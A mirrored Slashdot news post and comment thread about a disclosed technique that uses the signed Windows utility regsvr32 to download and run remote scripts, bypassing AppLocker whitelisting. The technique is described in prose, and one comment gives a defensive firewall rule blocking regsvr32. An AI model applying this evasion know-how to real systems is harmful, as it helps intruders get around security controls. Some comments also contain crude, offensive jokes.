Slashdot Mirror
Core Windows Utility Can Be Used To Bypass Whitelisting (threatpost.com)
Reader msm1267 writes: A core Windows command-line utility, Regsvr32, used to register DLLs to the Windows Registry can be abused to run remote code from the Internet, bypassing whitelisting protections such as Microsoft's AppLocker. A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft. It's unknown whether Microsoft will patch this issue with a security bulletin, or in a future release. Regsvr32, also known as Microsoft Register Server, is a Microsoft-signed binary that runs as default on Windows. The researcher's proof-of-concept allows him to download and run JavaScript or VBScript from a URL provided via the command line. "There's really no patch for this; it's not an exploit. It's just using the tool in an unorthodox manner. It's a bypass, an evasion tactic," the researcher said.The Register reports: "It's built-in remote code execution without admin rights and which bypasses Windows whitelisting. I'd say it's pretty bad," said Alex Ionescu, a Windows and ARM kernel guru. The trick -- Smith didn't want to call it an exploit -- is neat because it does not touch the Registry, does not need administrator rights, can be wrapped up in an encrypted HTTP session, and should leave no trace on disk as it's a pure to-memory download. No patch exists for this, although regsvr32 can be firewalled off from the internet. Microsoft was not available for immediate comment.
A researcher who requested anonymity found and recently privately disclosed the issue to Microsoft.
If you want news from today, you have to come back tomorrow.
Meh, it still wouldn't get past my firewall.
easy.
Windows System File checker will put that back.
If your firewall is on your router I will agree with you, but it you are talking about the firewall on Windows, then you are seriously mistaken.
Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".
Don't all browsers have url javascript shut off by default?
_ _ _ Go for the eyes Boo! GO FOR THE EYES!
You need to run regsvr32 with admin rights anyway. If you're dumb enough to register an unsafe/unknown component you deserve to get hacked.
Harrison's Postulate - "For every action there is an equal and opposite criticism"
Hilariously wrong. regsvr has been in every release of Windows since at least Windows 95 and it might have even been in 3.1. Back when "back doors" were just a twinkle in Ronald Reagan's eye.
It was basically Microsoft's first hit off the crack pipe otherwise known as COM.
That means nothing at all. Why would you think Micro$oft wasn't thinking about taking control over the OS in 95?
The Disable Advertising checkbox does not work.
I would think this can bypass Bit9 as well, since regsvr32 is a common windows component and allowed. Anyone got a different opinion?
It's a PowerShell command: New-NetFirewallRule -DisplayName "Block Regsrvr32" -Program "%SystemRoot%\System32\regsvr32.exe" -Direction Outbound -Action Block
ASCII tastes bad dude.
Binary it is then.
I'd laugh, except the regular "exploit du jour" thing just isn't funny any more.
Honestly, Windows has more holes than a Chinese whorehouse. Is it ever going to be a secure operating system?
Just cruising through this digital world at 33 1/3 rpm...
So basically the guy hat wrote the article had not read the TechNet article that Microsoft wrote about AppLocker's restrictions.
https://technet.microsoft.com/...
AppLocker rules either allow or prevent an application from launching. AppLocker does not control the behavior of applications after they are launched. Applications could contain flags passed to functions that signal AppLocker to circumvent the rules and allow another .exe or .dll to be loaded. In practice, an application that is allowed by AppLocker could use these flags to bypass AppLocker rules and launch child processes. You must thoroughly examine each application before allowing them to run by using AppLocker rules.
Good to hear. I need to get mine setup here soon before I get too many more "security patches" that fuck up my Win7 install. In fact I just need to set it to a very small whitelist for windows machines while leaving it open for Linux. I'm not sure how I'm going to do that yet though. Maybe set blocking by IP address and have static IP's?
I was a bit surprised to see this researcher has published complete details of how to exploit this, such as a sample XML file for launching cmd.exe. I don't see any indication that Casey Smith attempted to report this in a responsible way, or to give the vendor a chance to respond. This kind of disclosure could potentially do a lot of harm.
Neither Linus Torvalds nor Red Hat have used illicit monopolist tactics to dominate the market. Hence why we don't say "Linu$", but we do say "M$".
Redhat used illicit monopolist tactics to force systemd on the rest of the Linux community
*ducks*
In the free world the media isn't government run; the government is media run.
regsvr32 does not understand DLLs. scrobj.dll does... the contents of the /i switch are passed in to the DLL. Looks like the DLL is the one with the problem.Documentation
I expect most admins can simply block or remove the DLL with little impact on their system unless they are running some obscure program that requires it. Or, as another user suggested, firewall regsvr32 so it can't download files.
MAC won't work, I'm dual booting on all my machines. I'm leaning towards IP.
Soooo...remove execute permission for the binary from everyone but administrators? Problem solved?
My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM. Are you spoofing your MACs under Linux or something? I'm assuming your firewall is a router or other separate hardware appliance.
MACs are burned into the network controller's ROM.
LOL. Never played with VMware, have you? What would you like your MAC to be? I'll type it in for you if it's not autoassigned.
There are two types of people in the world: Those who crave closure
What? I was saying that blocking only Windows would not work by blocking by MAC address because I am dual booting on all my machines. I intend to block at the router level(ddwrt) by IP address and setting separate static IP addresses for Windows and Linux on all the machines.
The final goal is to only allow access to sites required for gaming when in Win7 with the possibility of a few others to support gaming like nexusmods.com
How do you know that this is the only function? Do you have the source code? Can you compile it yourself and compare it to the stock binary?
I didn't think so.
Well he said dual booting, not running VMs. I don't tend to consider running a VM as "dual booting", but I suppose that's just semantics. As for MAC: DEFACEDBABE1 was always fun (I remembered that from some website I no longer recall).
Can't you just rename the damn file to something else?
New Windows is part of a clever master plan. When people reject this disgusting new flavor, MS starts selling Windows Classic. In glass bottles. Made with real sugar.
"Prediction: within 10 years, Windows will be a Linux distribution." Me, 7-6-2016
My network-fu may be a little rusty, but why would that matter? MACs are burned into the network controller's ROM..
MACs have been editable on consumer shit for ages. My old ass nForce 2 chipset from 2002 had an option to define the MAC via the BIOS and via the driver, for example.
Any NIC supporting virtual interfaces (such as for VLANs) will do the same thing.
Then you've got VMs.
Then you've got the fact that my physical interfaces are many (2 wireless, 2 wired on my main box), so even if I want to stick with the default MAC I've got 4 to handle.
...This is a guy that participated in the development of ReactOS. It seems he's pretty smart. A pity he abandoned the project. It really needs people like him.
Okay so by posting that we know that you are immature at least intellectually, that you don't know the definition of malware - in fact being so far from the definition that you most likely have no clue about computers or programming.
The start of this sub-thread is ludicrous, no it isn't a back door for Microsoft to use. Know why? Us that actually knows what a computer is can check such things, maybe you'll learn about it when you grow up.
Are you serious? If they wanted to take control of the OS they could have done it without crappy hacks - AS THEY FUCKING WROTE THE FUCKING SYSTEM!
But can you run the above as root without having sudo privileges? The exploit is that anyone, even a browser can execute the code.
Custom electronics and digital signage for your business: www.evcircuits.com
The Register article has a bit more information. This isn't really a vulnerability. It's definitely not "remote code execution". It works like this:
- Microsoft provides a tool called AppLocker that can be used to limit the programs that can be run on a system.
- The AppLocker tool is not intended as a tight "security boundary". Instead, it is a way to implement company policies like "no playing games at work", or to help with software licensing, i.e. "the company system image has a copy of Photoshop, but you aren't in the Design department, so you aren't licensed to run it", and perhaps to reduce attack surface area.
- The Microsoft-provided sample AppLocker configuration (intended to show the syntax for AppLocker rules) happens to have a sample rule that whitelists all programs under C:\windows. This is not a "recommended" rule -- it's a "sample" rule.
- If you leave this rule in, there are a large number of ways to escape the sandbox.
- A researcher found another one. Yay, I guess?
The new one is interesting because I wouldn't have considered regsvr32 to be a command that allows for running of arbitrary other commands. On the other hand, it shouldn't belong in a production whitelist in the first place, so being able to use it to escape the sandbox isn't particularly interesting.
Time flies like an arrow. Fruit flies like a banana.
The stable ABI is what created most of the mess in Windows. Listing this as a shortcoming of Linux shows you have no idea what you're talking about. A huge mass of badly maintained binary only drivers is not a good thing, it's an incredible liability.
Drivers need to be maintained. The only way to ensure that is to have their maintenance be part of the kernel maintenance. A stable ABI would directly counteract this.
And Microsoft keeps doing transgressions. They haven't washed out their stripes. They've just been slapped on the wrist enough to not be blatant about it.
What do you mean with "crappy hacks"? Unless you are referring to the OS as a whole I do not know what you are talking about. I am talking about a backdoor built into the OS.